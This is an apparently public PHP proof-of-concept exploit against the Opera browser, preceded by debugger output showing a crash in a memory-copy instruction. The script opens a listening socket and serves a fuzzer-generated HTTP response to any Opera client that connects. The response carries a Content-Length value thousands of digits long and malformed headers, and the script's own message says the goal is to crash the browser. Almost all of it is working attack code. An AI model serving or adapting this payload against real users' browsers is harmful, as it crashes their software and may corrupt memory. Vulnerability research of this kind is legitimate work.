6781E0BA F3:A5 REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS:[ESI] <-- BUG 6781E0BC FF2495 D4E18167 JMP DWORD PTR DS:[EDX*4+6781E1D4] 6781E0C3 90 NOP 6781E0C4 8BC7 MOV EAX,EDI 6781E0C6 BA 03000000 MOV EDX,3 6781E0CB 83E9 04 SUB ECX,4 6781E0CE 72 0C JB SHORT Opera_12.6781E0DC 6781E0D0 83E0 03 AND EAX,3 6781E0D3 03C8 ADD ECX,EAX 6781E0D5 FF2485 E8E08167 JMP DWORD PTR DS:[EAX*4+6781E0E8] 6781E0DC FF248D E4E18167 JMP DWORD PTR DS:[ECX*4+6781E1E4] 6781E0E3 90 NOP 6781E0E4 FF248D 68E18167 JMP DWORD PTR DS:[ECX*4+6781E168] ... *--------------------------------------------------------------------------- * BREAK AT 6781E0BA ECX=3FFF3ABE (decimal 1073691326.) DS:[ESI]=[03DBB2F8]=00000000 ES:[EDI]=[01A23000]=??? *@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ * */ if(strtolower(substr($_ENV['OS'],0,3)) == "win") define('OS','win'); else define('OS','nix'); if(!extension_loaded('php_sockets')) { if((OS == 'win') && (!@dl('php_sockets.dll')) || ((OS == 'nix') && (!@dl('php_sockets.so')))) die('fatal php_sockets.[dll/so] '. 'not loaded '."\r\n"); //.__line__.' '.__file__."\r\n"); } /*Generated by my own fuzzer*/ $EVIL = 'HTTP/1.1 200 ok'."\r\n". 'Transfer-Encoding: identity'."\r\n". 'Date: thu 28 dec 2003 12:4:33 gmt'."\r\n". 'Server: moj zuy server'."\r\n". 'Set-Cookie: psid=d6dd02e9957fb162d2385ca6f2829a73;path=C:/'."\r\n". 'Content-Location: file://C:/boot.ini'."\r\n". 'Vary:negotiate,accept-language,accept-charset'."\r\n". 'Tcn: choice'."\r\n". 'Last-modified: sun,21 nov 2010 22:22:22 gmt'."\r\n". 'Etag: "3861-5c6-1b28fa80;386a-9dc-1b28fa80"'."\r\n". 'Accept-Ranges: bytes'."\r\n". 'Cache-Control: max-age=0'."\r\n". 'Expires: mon, 22 feb 2010 18:31:20 gmt'."\r\n". 'Content-Encoding: identity'."\r\n". 'Content-Length:9999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999666'."\r\n". //'Content-Length:99999999999999999999999999999999666'."\r\n". 'Via: 1.1 cache.zuo.pl:3128 (squid/2.7.stable6)'."\r\n". 'Keep-Alive: timeout=15, max=300'."\r\n". 'Connection: keep-alive'."\r\n". 'Content-Type: text/html; charset=iso-8859-2'."\r\n". 'Age: 1'."\r\n". 'Allow: GET,HEAD'."\r\n". 'Content-Disposition: inline'."\r\n". 'Content-MD5: Q2hlY2sgSW50ZWdyaXR5IQ=='."\r\n". 'Warning: 199 Miscellaneous warning'."\r\n". 'Trailer: Max-Forwards'."\r\n". 'Location: chrome://inspector/content/viewers/dom/dom.xul'."\r\n". 'Content-Range: bytes 21010-47021/47022'."\r\n". 'Content-Language: pl'."\r\n\r\n". 'seq_end'; $buster = $argc - 1; //use -port 666 if you need for($i = 1; $i<=$buster; $i+=2) { if(('-port' == $argv[$i]) && ((int)$argv[$i + 1] > 0)) $PORT = $argv[$i + 1]; else $PORT = 81; } if(!($SOCKET = socket_create_listen($PORT))) die('fatal socket init failed'."\r\n"); socket_set_option($SOCKET,SOL_SOCKET, SO_RCVTIMEO,array("sec"=>3,"usec"=>0)); echo('SOCKET READY AT PORT '.$PORT."\r\n". 'Now connect here via opera'."\r\n"); if($CONNECT = socket_accept($SOCKET)) { $recv_buffer = null; echo('Connection ok '."\r\n"); if(socket_recv($CONNECT,$recv_buffer,8,/*msg_dontwait*/MSG_WAITALL)) { if(!@socket_write($CONNECT,$EVIL)) { socket_close($CONNECT); socket_close($SOCKET); die('I cant send payload !'."\r\n"); } } else echo('Something wrong with client side'."\r\n"); usleep(120000); socket_close($CONNECT); socket_close($SOCKET); } echo('OK ya browser must be death now'."\r\n". 'Have a nice day lol'."\r\n"); //[2010-03-03 20:47:46] //i cut be milion dolar man ;= ?>